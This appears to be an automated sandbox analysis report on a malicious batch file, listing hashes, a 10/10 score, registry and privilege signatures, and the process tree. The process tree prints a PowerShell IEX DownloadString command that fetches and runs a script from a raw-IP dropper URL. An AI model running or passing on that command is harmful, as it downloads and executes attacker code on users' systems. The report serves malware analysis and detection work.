Analysis
-
max time kernel
135s -
max time network
150s -
platform
windows10_x64 -
resource
win10v191014 -
submitted
11-02-2020 19:10
Static task
static1
Behavioral task
behavioral1
Sample
hBjM939D.bat
Resource
win7v191014
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
hBjM939D.bat
Resource
win10v191014
windows10_x64
0 signatures
0 seconds
General
-
Target
hBjM939D.bat
-
Size
198B
-
MD5
31f14e4e5545659b2edf91aedb0830cb
-
SHA1
e5489bc5f3b8f118e6fb0ba7f5f4a0223a33863a
-
SHA256
2f3a2162c69c2185edadd4cc4d60b0ef9f2d212d2d710f30e012b9878aefc0f1
-
SHA512
80298267b14e688189cfefabed44496c5c22a51c50c788ac72ed1b9ad4ab1848068308f1a7990665ebba4220a428cdb7a1a5695a3643ea395af7566726914562
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/hBjM939D
Signatures
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
WerFault.exepid process 5112 WerFault.exe 5112 WerFault.exe 5112 WerFault.exe 5112 WerFault.exe 5112 WerFault.exe 5112 WerFault.exe 5112 WerFault.exe 5112 WerFault.exe 5112 WerFault.exe 5112 WerFault.exe 5112 WerFault.exe 5112 WerFault.exe 5112 WerFault.exe 5112 WerFault.exe 5112 WerFault.exe 5112 WerFault.exe 5112 WerFault.exe 5112 WerFault.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid process 5112 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 5112 WerFault.exe Token: SeBackupPrivilege 5112 WerFault.exe Token: SeDebugPrivilege 5112 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\hBjM939D.bat"1⤵PID:4936
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/hBjM939D');Invoke-MHYLWDFAYARXBSG;Start-Sleep -s 10000"2⤵PID:4980
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 7043⤵
- Suspicious behavior: EnumeratesProcesses
- Checks processor information in registry
- Enumerates system info in registry
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5112
-
\??\c:\windows\system32\taskhostw.exetaskhostw.exe -RegisterDevice -SettingChange -Full1⤵PID:4184